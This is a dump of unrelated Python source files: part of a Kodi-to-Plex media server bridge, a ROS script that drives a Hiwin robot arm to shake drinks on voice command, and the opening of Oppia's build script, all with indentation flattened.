for index, option in enumerate(["channels", "clients", "hubs", "library", "music", "neighborhood",
"playQueues", "player", "playlists", "resources", "search", "server", "servers",
"statistics", "system", "transcode", "updater", "video"]):
root.append(xml.etree.ElementTree.Element("Directory", attrib={"count": "1", "key": option, "title": option}))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_sections(request):
video_playlists = await kodi_request(request.app,
"Files.GetDirectory",
["special://videoplaylists/",
"video",
["file"],
{"method": "label",
"order": "ascending"}])
video_playlists = video_playlists["result"]["files"]
video_playlists_count = len(video_playlists)
result = """<MediaContainer size="%d" allowSync="0" identifier="com.plexapp.plugins.library" mediaTagPrefix="/system/bundle/media/flags/"\
mediaTagVersion="1420847353" title1="Plex Library">""" % (video_playlists_count + 1)
# All Movies
result += """<Directory allowSync="0" art="/:/resources/movie-fanart.jpg" filters="1" refreshing="0" thumb="/:/resources/movie.png"\
key="0" type="movie" title="All Movies" composite="/library/sections/6/composite/1423495904" agent="com.plexapp.agents.themoviedb"\
scanner="Plex Movie Scanner" updatedAt="1423495904" createdAt="1413134298" />"""
# All TV Shows
result += """<Directory key="1" type="show" title="All TV Shows" filters="1" />"""
request.app["playlists"] = video_playlists
for index, video_playlist in enumerate(video_playlists):
pprint.pprint(video_playlist)
result += """<Directory filters="1" key="%d" type="movie" title="%s" />""" \
% (index + 2, video_playlist["label"])
result += "</MediaContainer>"
if request.app["debug"]:
logger.debug(result)
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + result.encode("utf8"))
async def get_all_movies(request, result_field_name, method):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "movie"})
option = request.match_info["option"]
logger.debug("Get all movies with open %s", option)
if 'all' == option:
start_item = int(request.GET["X-Plex-Container-Start"])
end_item = start_item + int(request.GET["X-Plex-Container-Size"])
logger.debug("Requested all Movies from %d to %d", start_item, end_item)
all_movies = await method
root.attrib["totalSize"] = str(all_movies["result"]["limits"]["total"])
if start_item != end_item:
for movie in all_movies["result"][result_field_name]:
if "movieid" in movie:
movie_id = str(movie.get("movieid"))
else:
movie_id = str(movie["id"])
root.append(xml.etree.ElementTree.Element("Video",
attrib={"id": movie_id,
"type": "movie",
"title": movie['label'],
"rating": str(movie['rating']),
"summary": movie['plot'],
"year": str(movie['year']),
"thumb": movie['thumbnail'],
"key": "/library/metadata/movie/%s" % movie_id}))
elif "firstCharacter" == option:
all_movies = await method
character_dict = collections.defaultdict(int)
for movie in all_movies["result"][result_field_name]:
first_character = movie['label'].upper()[0]
if first_character.isalpha():
character_dict[first_character] += 1
else:
character_dict['#'] += 1
for character in sorted(character_dict.keys()):
root.append(xml.etree.ElementTree.Element("Directory", attrib={"size": str(character_dict[character]),
"key": character,
"title": character}))
elif "sorts" == option:
sort_dict = {"Date Added": "dateadded",
"Date Viewed": "lastplayed",
"Year": "year",
"Name": "label",
"Rating": "rating"}
for sort_name, sort_key in sort_dict.items():
root.append(xml.etree.ElementTree.Element("Directory", attrib={"defaultDirection": "desc",
"descKey": "%s:desc" % sort_key,
"key": sort_key,
"title": sort_name}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_all_tvshows(request):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "show"})
option = request.match_info["option"]
logger.debug("Get all tv shows with open %s", option)
if 'all' == option:
start_item = int(request.GET["X-Plex-Container-Start"])
end_item = start_item + int(request.GET["X-Plex-Container-Size"])
view_type = int(request.GET.get("type", 2))
sort_type, sort_direction = request.GET.get("sort", "label:asc").split(":")
# on Android we sometimes get this sort as default, so we change it
if "titleSort" == sort_type:
sort_type = "label"
sort_direction = "ascending" if sort_direction == "asc" else "descending"
logger.debug("Requested all TV shows from %d to %d, sort by %s direction %s", start_item, end_item, sort_type, sort_direction)
all_tv_shows = await kodi_request(request.app,
"VideoLibrary.GetTVShows",
{"properties": ["art", "rating", "thumbnail", "playcount", "file", "plot", "watchedepisodes",
"episode", "season"],
"sort": {"order": sort_direction, "method": sort_type}})
if start_item == 0 and end_item == 0:
# workaround for bug in KODI where the result from limits
# can't be trusted
request.app["kodi_tvshow_total"] = len(all_tv_shows["result"]["tvshows"])
root.attrib["totalSize"] = str(request.app.get("kodi_tvshow_total", len(all_tv_shows["result"]["tvshows"])))
if start_item != end_item:
for tv_show in all_tv_shows["result"]["tvshows"][start_item:end_item]:
root.append(xml.etree.ElementTree.Element("Video",
attrib={"type": "show",
"title": tv_show['label'],
"summary": tv_show['plot'],
"thumb": tv_show['thumbnail'],
"leafCount": str(tv_show['episode']),
"viewedLeafCount": str(tv_show['watchedepisodes']),
"childCount": str(tv_show['season']),
"key": "/library/metadata/tvshow/%d/children" % tv_show["tvshowid"]}))
elif "firstCharacter" == option:
all_movies = await kodi_request(request.app, "VideoLibrary.GetTVShows", {})
character_dict = collections.defaultdict(int)
for movie in all_movies["result"]["tvshows"]:
first_character = movie['label'].upper()[0]
if first_character.isalpha():
character_dict[first_character] += 1
else:
character_dict['#'] += 1
for character in sorted(character_dict.keys()):
root.append(xml.etree.ElementTree.Element("Directory", attrib={"size": str(character_dict[character]),
"key": character,
"title": character}))
elif "sorts" == option:
sort_dict = {"Date Added": "dateadded",
"Date Viewed": "lastplayed",
"Name": "label",
"Rating": "rating"}
for sort_name, sort_key in sort_dict.items():
root.append(xml.etree.ElementTree.Element("Directory", attrib={"defaultDirection": "desc",
"descKey": "%s:desc" % sort_key,
"key": sort_key,
"title": sort_name}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_section(request):
"""
Returns the items for a sections
"""
section_id = int(request.match_info['section_id'])
sort_type, sort_direction = request.GET.get("sort", "label:asc").split(":")
sort_direction = "ascending" if sort_direction == "asc" else "descending"
# on Android we sometimes get this sort as default, so we change it
if "titleSort" == sort_type:
sort_type = "label"
logger.debug("Request for library section %s, sort type %s and direction %s", section_id, sort_type, sort_direction)
if 0 == section_id:
start_item = int(request.GET.get("X-Plex-Container-Start", 0))
end_item = start_item + int(request.GET.get("X-Plex-Container-Size", 0))
return await get_all_movies(request,
"movies",
kodi_request(request.app,
"VideoLibrary.GetMovies",
{"limits": {"start": start_item,
"end": end_item if end_item != start_item else start_item + 1},
"properties": ["rating", "thumbnail", "playcount", "file", "year", "plot"],
"sort": {"order": sort_direction, "method": sort_type}}))
elif 1 == section_id:
return await get_all_tvshows(request)
else:
section_id -= 2
playlist = request.app["playlists"][section_id]
pprint.pprint(playlist)
return await get_all_movies(request,
"files",
kodi_request(request.app,
"Files.GetDirectory",
[playlist["file"],
"video",
["rating", "thumbnail", "playcount", "file", "year", "plot"],
{"order": sort_direction, "method": sort_type}]))
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_tvshow_info(request):
tvshow_id = int(request.match_info["tvshow_id"])
show_info = await kodi_request(request.app,
"VideoLibrary.GetTVShowDetails",
[tvshow_id,
["title", "genre", "year", "rating", "plot", "studio", "mpaa", "cast",
"playcount", "episode", "imdbnumber", "premiered", "votes", "lastplayed",
"fanart", "thumbnail", "file", "originaltitle", "sorttitle", "episodeguide",
"season", "watchedepisodes", "dateadded", "tag", "art"]])
show_info = show_info["result"]["tvshowdetails"]
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library"})
video_node = xml.etree.ElementTree.Element("Directory",
attrib={"type": "show",
"key": "/library/metadata/tvshow/%d/children" % tvshow_id,
"title": show_info['label'],
"studio": "" if not show_info['studio'] else show_info['studio'][0],
"summary": show_info['plot'],
"year": str(show_info['year']),
"rating": str(show_info["rating"]),
"art": show_info["fanart"],
"thumb": show_info['thumbnail']})
root.append(video_node)
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_tvshow(request):
tvshow_id = int(request.match_info["tvshow_id"])
all_seasons = await kodi_request(request.app,
"VideoLibrary.GetSeasons",
[tvshow_id,
["season", "playcount", "watchedepisodes", "episode", "thumbnail", "tvshowid"]])
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "season",
"key": str(tvshow_id)})
for season in all_seasons["result"]["seasons"]:
root.append(xml.etree.ElementTree.Element("Directory", attrib={"leafCount": str(season["episode"]),
"type": "season",
"title": season["label"],
"index": str(season["season"]),
"thumb": season['thumbnail'],
"viewedLeafCount": str(season["watchedepisodes"]),
"parentRatingKey": str(tvshow_id),
"ratingKey": "tv%ds%d" % (tvshow_id, season['season']),
"key": "/library/metadata/tvshow/%d/%d/children" % (tvshow_id, season['season'])}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_tvshow_season(request):
tvshow_id = int(request.match_info["tvshow_id"])
season = int(request.match_info["season"])
if request.path.endswith("/children"):
all_episodes = await kodi_request(request.app,
"VideoLibrary.GetEpisodes",
[tvshow_id,
season,
["title", "plot", "votes", "rating", "writer", "firstaired", "playcount", "runtime",
"director", "productioncode", "season", "episode", "originaltitle", "showtitle",
"cast", "streamdetails", "lastplayed", "fanart", "thumbnail", "file", "resume",
"tvshowid", "dateadded", "uniqueid", "art"]])
root = xml.etree.ElementTree.Element("MediaContainer",
attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "episode",
"parentIndex": str(season),
"nocache": "1",
"key": str(tvshow_id)})
for episode in all_episodes["result"]["episodes"]:
root.append(xml.etree.ElementTree.Element("Video",
attrib={"type": "episode",
"title": episode["title"],
"index": str(episode["episode"]),
"thumb": episode['thumbnail'],
"summary": episode['plot'],
"viewCount": str(episode['playcount']),
"viewOffset": str(int(episode["resume"]["position"]*1000)),
"parentRatingKey": str(tvshow_id),
"key": "/library/metadata/episode/%d" % episode["episodeid"],
"parentKey": "/library/metadata/tvshow/%d/%d" % (tvshow_id, season)}))
else:
show_info = await kodi_request(request.app,
"VideoLibrary.GetTVShowDetails",
[tvshow_id,
["title", "genre", "year", "rating", "plot", "studio", "mpaa", "cast",
"playcount", "episode", "imdbnumber", "premiered", "votes", "lastplayed",
"fanart", "thumbnail", "file", "originaltitle", "sorttitle", "episodeguide",
"season", "watchedepisodes", "dateadded", "tag", "art"]])
show_info = show_info["result"]["tvshowdetails"]
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library"})
root.append(xml.etree.ElementTree.Element("Directory",
attrib={"type": "season",
"parentRatingKey": str(tvshow_id),
"title": "Season %d" % season,
"parentTitle": show_info['label'],
"art": show_info["fanart"],
"thumb": show_info['thumbnail'],
"index": str(season),
"key": "/library/metadata/tvshow/%d/%d/children" % (tvshow_id, season)}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_episode(request):
episode_id = int(request.match_info["episode_id"])
root = xml.etree.ElementTree.Element("MediaContainer",
attrib={"identifier": "com.plexapp.plugins.library"})
root.append(await get_episode_node(request.app, episode_id))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_movie(request):
movie_id = int(request.match_info["movie_id"])
return await _get_library_metadata_movie(request, movie_id)
async def _get_library_metadata_movie(request, movie_id):
"""
Returns the metadata for a movie
:returns: an empty MediaContainer
"""
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
root.append(await get_movie_node(request.app, movie_id))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_prefs(request):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
root.append(xml.etree.ElementTree.Element("Setting",
attrib={"id": "FriendlyName",
"label": "Friendly name",
"default": "",
"summary": "This name will be used to identify this media server to other computers on your network."
"If you leave it blank, your computer's name will be used instead.",
"type": "text",
"value": "",
"hidden": "0",
"advanced": "0",
"group": "general"}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
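# Plex clients POST to /playQueues before starting playback; respond with a queue that
# contains only the requested movie or episode node.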
async def post_playqueues(request):
play_uri = request.GET["uri"].split("%2F")
video_id = int(play_uri[-1])
print(request.GET["uri"])
root = xml.etree.ElementTree.Element("MediaContainer",
attrib={"playQueueID": str(request.app["playqueuecounter"] + 1),
"playQueueSelectedItemID": str(request.app["playqueuecounter"]),
"playQueueSelectedMetadataItemID": str(video_id),
"playQueueSourceURI": "library://50956afc-8f35-435d-9643-4142a7232186/item/%2Flibrary%2Fmetadata%2F"
+ str(video_id),
"playQueueSelectedItemOffset": "0"})
request.app["playqueuecounter"] += 1
if "movie" == play_uri[-2]:
root.append(await get_movie_node(request.app, video_id))
elif "episode" == play_uri[-2]:
root.append(await get_episode_node(request.app, video_id))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_empty(request):
"""
Simple handler for unknown requests
:returns: an empty MediaContainer
"""
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_kodidownload(request):
"""
Downloads a file from KODI
:returns: returns the file
"""
to_download_url = request.GET["url"]
# sometimes Plex clients send a http as prefix
if to_download_url.startswith("http://"):
# FIX IT by removing iter
if "image://" in to_download_url:
to_download_url = "image://" + to_download_url.split("image://")[1]
logger.debug("Got request to download '%s'", to_download_url)
download_info = await kodi_request(request.app, "Files.PrepareDownload", [to_download_url])
download_url = request.app["kodi"] + download_info['result']['details']['path']
kodi_response = await request.app["client_session"].get(download_url)
logger.debug("Download URL: %s", download_url)
return aiohttp.web.Response(body=await kodi_response.read())
async def send_websocket_notification(app):
for ws in app['websockets']:
ws.send_str("""{
"_elementType": "NotificationContainer",
"type": "timeline",
"size": 1,
"_children": [
{
"_elementType": "TimelineEntry",
"sectionID": 1,
"itemID": 8,
"type": 1,
"title": "Life of Crime",
"state": 5,
"mediaState": "analyzing",
"updatedAt": 1467101125
}
]
}""")
async def websocket_handler(request):
# Create response
resp = aiohttp.web.WebSocketResponse()
# try to upgrade the connection to a WebSocket
ok, protocol = resp.can_prepare(request)
if not ok:
logger.error("Couldn't upgrade to WebSocket")
return None
# prepare the response
await resp.prepare(request)
# add to clients
request.app['websockets'].append(resp)
logger.debug("WebSocket connected")
# keep the connections
async for msg in resp:
# just loop for now
pass
# we are done => disconnect and remove
request.app['websockets'].remove(resp)
logger.debug('WebSocket disconnected')
# return
return resp
if __name__ == "__main__":
# parse the command line arguments
parser = argparse.ArgumentParser(description='Kodi2Plex')
parser.add_argument('-kp', '--kodi-port', metavar='port', type=int, help='Port of the kodi web interface', default=8080)
parser.add_argument('-kh', '--kodi-host', metavar='ip/hostname', type=str, help='Name or IP of the kodi machine')
parser.add_argument('-pp', '--plex-port', metavar='port', type=int, help='Port of the plex interface (default=32400)', default=32400)
parser.add_argument('-pw', '--plex-web', metavar='location of WebClient.bundle', type=str,
help='location of the WebClient.bundle to activate the Plex Web Client')
parser.add_argument('-gdm', action='store_true', help="Broadcast the server via GDM (Good day mate) so Plex clients can find the server automatically")
parser.add_argument('-n', '--name', metavar='display name', type=str, help='Name for display in Plex', default="Kodi2Plex")
parser.add_argument('-v', '--verbose', action='store_true', help="Shows a lot of messages")
parser.add_argument('-d', '--debug', action='store_true', help="Shows a lot of DEBUG messages!!!!")
args = parser.parse_args()
# create the logger
logger = logging.getLogger("kodi2plex")
# add a stream handler
ch = logging.StreamHandler()
logger.addHandler(ch)
# set logging.DEBUG if the user has specified -v or -d
if args.verbose or args.debug:
logger.setLevel(logging.DEBUG)
logger.debug(args)
# no host => no go
if not args.kodi_host:
logger.error("No kodi host defined")
sys.exit(-1)
# the MAIN LOOP we are living in
main_loop = asyncio.get_event_loop()
# the aiohttp Application instance (subclass of dict)
kodi2plex_app = aiohttp.web.Application(middlewares=[IndexMiddleware()], # the middleware is required to
# convert */ to */index.html
loop=main_loop,
logger=logger)
# set some settings
kodi2plex_app["title"] = args.name
kodi2plex_app["kodi"] = "http://%s:%d/" % (args.kodi_host, args.kodi_port)
kodi2plex_app["kodi_url"] = "http://%s:%d/jsonrpc" % (args.kodi_host, args.kodi_port)
kodi2plex_app["server_ip"] = socket.gethostbyname(socket.gethostname())
kodi2plex_app["kodi_jsonrpc_counter"] = 0
kodi2plex_app["client_session"] = aiohttp.ClientSession()
kodi2plex_app["playlists"] = []
kodi2plex_app["debug"] = args.debug
kodi2plex_app["playqueuecounter"] = 0
main_loop.run_until_complete(init_kodi(kodi2plex_app))
# Has the user defined a path to the WebClient.bundle from Plex?
if args.plex_web:
# try using it
web_path = os.path.join(os.path.realpath(args.plex_web), "Contents", "Resources")
# Does it exist?
if not os.path.exists(web_path):
logger.error("WebClient path does not exists: %s", web_path)
sys.exit(-1)
logger.info("Using WebClient from %s", web_path)
# add a route to the directory
kodi2plex_app.router.add_static('/web/', web_path)
kodi2plex_app.router.add_route('GET', '/', get_root)
kodi2plex_app.router.add_route('GET', '/library/sections', get_library_sections)
kodi2plex_app.router.add_route('GET', r'/library/sections/{section_id:\d+}/{option}', get_library_section)
kodi2plex_app.router.add_route('GET', r'/library/metadata/movie/{movie_id:\d+}', get_library_metadata_movie)
kodi2plex_app.router.add_route('GET', r'/library/metadata/tvshow/{tvshow_id:\d+}', get_library_metadata_tvshow_info)
kodi2plex_app.router.add_route('GET', r'/library/metadata/tvshow/{tvshow_id:\d+}/children', get_library_metadata_tvshow)
kodi2plex_app.router.add_route('GET', r'/library/metadata/tvshow/{tvshow_id:\d+}/{season:\d+}', get_library_metadata_tvshow_season)
kodi2plex_app.router.add_route('GET', r'/library/metadata/tvshow/{tvshow_id:\d+}/{season:\d+}/children', get_library_metadata_tvshow_season)
kodi2plex_app.router.add_route('GET', r'/library/metadata/episode/{episode_id:\d+}', get_library_metadata_episode)
kodi2plex_app.router.add_route('GET', '/:/prefs', get_prefs)
kodi2plex_app.router.add_route('POST', '/playQueues', post_playqueues)
kodi2plex_app.router.add_route('GET', '/photo/:/transcode', get_kodidownload)
kodi2plex_app['websockets'] = []
kodi2plex_app.router.add_route('GET', '/:/websockets/{path:.*}', websocket_handler)
# per default we return an empty MediaContainer
# !!!!! NEEDS TO BE THE LAST ROUTE
kodi2plex_app.router.add_route('GET', '/{tail:.*}', get_empty)
# setup gdm?
if args.gdm:
GDM_ADDR = '239.0.0.250'
GDM_PORT = 32414
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', GDM_PORT))
# add the socket to the multicast group on all interfaces.
group = socket.inet_aton(GDM_ADDR)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
gdm_thread = threading.Thread(target=gdm_broadcast, args=(sock, kodi2plex_app))
gdm_thread.start()
handler = kodi2plex_app.make_handler(debug=args.debug, access_log=logger if args.debug or args.verbose else None)
f = main_loop.create_server(handler, '0.0.0.0', args.plex_port)
srv = main_loop.run_until_complete(f)
logger.debug('serving on %s', srv.sockets[0].getsockname())
try:
main_loop.run_forever()
except KeyboardInterrupt:
pass
finally:
srv.close()
main_loop.run_until_complete(srv.wait_closed())
main_loop.run_until_complete(kodi2plex_app.shutdown())
main_loop.run_until_complete(handler.finish_connections(60.0))
main_loop.run_until_complete(kodi2plex_app.cleanup())
main_loop.close()
# shut down GDM nicely
if args.gdm:
sock.close()
gdm_thread.join()
|
shake_strategy_trigger.py | #!/usr/bin/env python3
# license removed for brevity
#encoding:utf-8
# smart-shaking strategy trigger for hiwin manipulator RA605 (needs a connection)
# =======================================================================
# =15/07/2019:add step select, write out position adjust result =
# =13/07/2019:add simulation =
# =12/07/2019:import most functions instead of define =
# = updated control package; add position adjust =
# = incorporate move_test, move_drink, coordinate_collation =
# =======================================================================
import datetime
import enum
import os
import threading
import tkinter as tk
from time import sleep, time
import numpy as np
import rospy
import speech_recognition as sr
from ROS_Socket.msg import *
from ROS_Socket.srv import *
from std_msgs.msg import Int32MultiArray, String
import Hiwin_RT605_Socket as ArmTask
import pos_change_interface as pos_inter
import shake_strategy_content as shake_cont
##----Arm state-----------
Arm_state_flag = 0
Sent_data_flag = 1
t=time()
##----Arm status enum
class Arm_status(enum.IntEnum):
Idle = 0
Isbusy = 1
Error = 2
shutdown = 6
def callback(state):
global Arm_state_flag,Sent_data_flag,t
# print('get callback!\t{:.3f}\ts'.format(time()-t))
t=time()
Arm_state_flag = state.data[0]
Sent_data_flag = state.data[1]
def arm_state_listener():
rospy.Subscriber("chatter", Int32MultiArray, callback)
###-------------------------strategy---------------------
##-------move control part-------------
wait_for_enter_flag = False
adjust_pos_flag = False
to_change_flag = False
Target_Pos=shake_cont.Point_cls(shake_cont.Current_Pos.x,shake_cont.Current_Pos.y,shake_cont.Current_Pos.z,
shake_cont.Current_Pos.pitch,shake_cont.Current_Pos.roll,shake_cont.Current_Pos.yaw)
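# Apply the accumulated offsets in shake_cont.Pos_diff to the target pose, send it to the
# arm, and block until the controller reports Idle again.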
def RefreshTargetPos():
global Sent_data_flag,Arm_state_flag,Target_Pos
shake_cont.Hiwin_Move_Log.WriteOut(shake_cont.Pos_diff)
for var in range(6):
Target_Pos.ChangeSelf(var,shake_cont.Pos_diff[var])
ArmTask.point_data(Target_Pos.x,Target_Pos.y,Target_Pos.z,Target_Pos.pitch,Target_Pos.roll,Target_Pos.yaw)
ArmTask.Arm_Mode(2,1,shake_cont.gp_stop,shake_cont.speed_value,2)#action,ra,grip,vel,both
print('current position: ',[Target_Pos.x,Target_Pos.y,Target_Pos.z,Target_Pos.pitch,Target_Pos.roll,Target_Pos.yaw])
shake_cont.Pos_diff=[float(0) for i in range(6)]
while 1:
if Sent_data_flag and Arm_state_flag == Arm_status.Idle:
break
def Adjust_Pos(string):
global to_change_flag,Target_Pos
Target_Pos=shake_cont.Point_cls(shake_cont.Current_Pos.x,shake_cont.Current_Pos.y,shake_cont.Current_Pos.z,
shake_cont.Current_Pos.pitch,shake_cont.Current_Pos.roll,shake_cont.Current_Pos.yaw)
# pos_inter.PosChange()
pos_change_thread=threading.Thread(target=pos_inter.PosChange)
pos_change_thread.start()
while not shake_cont.pos_ok_flag:
print('Waiting for OK to move to next point...')
sleep(0.5)
pos_change_thread.join()
shake_cont.Adjust_Log.WriteOut(string+':'+str(Target_Pos.x)+','+str(Target_Pos.y)+','+str(Target_Pos.z)+','+str(Target_Pos.pitch)+','+str(Target_Pos.roll)+','+str(Target_Pos.yaw))
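# Single motion primitive: optionally wait for user confirmation, push the target pose and
# gripper command to the arm, log the move, and poll until the arm is Idle; a position
# adjustment step is triggered afterwards when adjust_pos_flag is set.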
def Hiwin_Move(Position,speed,grip,string):
global Sent_data_flag,Arm_state_flag,wait_for_enter_flag,t
if wait_for_enter_flag:
# input("下一步按Enter")
tk.messagebox.showinfo(message='Next Point?')
ArmTask.Speed_Mode(shake_cont.arm_speed_mode)
ArmTask.Arm_Mode(4,1,grip,speed,2)#action,ra,grip,vel,both
ArmTask.point_data(Position.x,Position.y,Position.z,Position.pitch,Position.roll,Position.yaw)
ArmTask.Arm_Mode(shake_cont.move_mode,1,grip,speed,2)#action,ra,grip,vel,both
print(shake_cont.move_mode)
shake_cont.Hiwin_Move_Log.WriteOut(string+':')
shake_cont.Hiwin_Move_Log.WriteOut('to position: '+str([Position.x,Position.y,Position.z,Position.pitch,Position.roll,Position.yaw]))
if grip==shake_cont.gp_stop:
sleep(0.75)
else:
sleep(0.8)
while 1:
if Sent_data_flag == 1 and Arm_state_flag == Arm_status.Idle:
# print('arm idle\t{:.3f}\ts'.format(time()-t))
t=time()
break
if adjust_pos_flag:
Adjust_Pos(string)
Hiwin_Action=shake_cont.Action_cls(Hiwin_Move)
Hiwin_Shake_Strategy=shake_cont.Shake_Strategy_cls(1,2,1,not wait_for_enter_flag)
def Shake():
global wait_for_enter_flag,adjust_pos_flag
if Hiwin_Shake_Strategy.CheckCmd():
shake_cont.move_str=shake_cont.cmd_str
shake_cont.Hiwin_Move_Log.StartWrite('Real Action')
shake_cont.Hiwin_Move_Log.WriteDate()
Hiwin_Shake_Strategy.SmartShaking(Hiwin_Action)
tk.messagebox.showinfo(title='Finished!',message='Time used:\n {:.0f} m {:.2f} s'.format((time()-shake_cont.start_time)//60,(time()-shake_cont.start_time)%60))
shake_cont.Home(Hiwin_Action)
wait_for_enter_flag=False
adjust_pos_flag=False
##-------move control part end-------------
##-------speech recognition part-------------
def SpeechTriggerShaking():
global wait_for_enter_flag,adjust_pos_flag
while True:
# Record Audio
r = sr.Recognizer()
with sr.Microphone() as source:
r.adjust_for_ambient_noise(source, duration=0.5)
print("Say something!")
audio = r.listen(source)
# Speech recognition using Google Speech Recognition
try:
shake_cont.cmd_str = r.recognize_google(audio,language = 'zh-TW')
shake_cont.move_str=shake_cont.cmd_str
if Hiwin_Shake_Strategy.CheckCmd():
break
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
shake_cont.Hiwin_Move_Log.StartWrite('')
shake_cont.Hiwin_Move_Log.WriteDate()
Hiwin_Shake_Strategy.SmartShaking(Hiwin_Action)
tk.messagebox.showinfo(title='Finished!',message='Time used:\n {:.0f} m {:.2f} s'.format((time()-shake_cont.start_time)//60,(time()-shake_cont.start_time)%60))
shake_cont.Home(Hiwin_Action)
wait_for_enter_flag=False
adjust_pos_flag=False
##-------speech recognition part end-------------
def DefaultShaking():
global wait_for_enter_flag
shake_cont.cmd_str='冬瓜紅茶半糖全冰'  # winter melon black tea, half sugar, full ice
wait_for_enter_flag=False
Hiwin_Shake_Strategy.delay_flag=not wait_for_enter_flag
Shake()
class Solo_Action_cls(shake_cont.Action_cls):
def __init__(self,action):
self.action=action
def ArmMove(self,Position,speed,grip,string):
shake_cont.move_mode=2
shake_cont.move_str=string
shake_cont.Current_Pos=shake_cont.Point_cls(Position.x,Position.y,Position.z,Position.pitch,Position.roll,Position.yaw)
self.action.MoveFunc(Position,speed,grip,string)
sleep(0.5)
def GripCtrl(self,Position,speed,gp_ctrl,move_str,grip_str):
self.ArmMove(Position,speed,shake_cont.gp_stop,move_str) #move
shake_cont.Current_grip=shake_cont.grip_state_str.split()[gp_ctrl]
self.ArmMove(Position,speed,gp_ctrl,grip_str) #grip
# sleep()
if shake_cont.grip_delay:
sleep(0.5)
Hiwin_Solo_Action=Solo_Action_cls(Hiwin_Action)
def CoordinateCollation():
while 1:
input("左下定位")
shake_cont.Left(Hiwin_Action)
input("右上定位")
shake_cont.Right(Hiwin_Action)
if input('OK?')=='1':
shake_cont.Home(Hiwin_Action)
break
def PosAdjust():
global adjust_pos_flag
adjust_pos_flag=True
shake_cont.Adjust_Log.WriteDate()
Shake()
###-------------strategy end-----------------
if __name__ == '__main__':
argv = rospy.myargv()
rospy.init_node('strategy', anonymous=True)
GetInfoFlag = True #Test no data
arm_state_listener()
while 1:
start_cmd_str=int(input('Enter a command:\n\tStart voice recording:\t1\n\tDefault drink:\t2\n\tCoordinate test:\t3\n\tCoordinate calibration:\t4\n\tDefault simulation:\t5\n\tQuit:\t\tEnter\n')) # read the start command
shake_cont.speed_value=int(input('Speed setting:'))
print('Enter the steps to skip:\n1: add ice\n2: add drink\n3: add fructose syrup\n4: put on the large lid\n5: shake the drink\n6: remove the small lid\n7: pour into the shaker cup')
skip_step_flag=[int(i) for i in input().split()]
for step in skip_step_flag:
shake_cont.step_flag[step-1]=False
if start_cmd_str == 1 :
SpeechTriggerShaking()
elif start_cmd_str == 2 :
DefaultShaking()
elif start_cmd_str == 3 :
shake_cont.cmd_str='冬瓜紅茶半糖少冰'  # winter melon black tea, half sugar, less ice
PosAdjust()
# coordinate collation
elif start_cmd_str == 4:
CoordinateCollation()
else:
break
##--------------shut down-------------
shake_cont.byebye()
ArmTask.rospy.spin()
rospy.spin()
|
build.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
# pylint: disable=invalid-name
import argparse
import collections
import fnmatch
import hashlib
import json
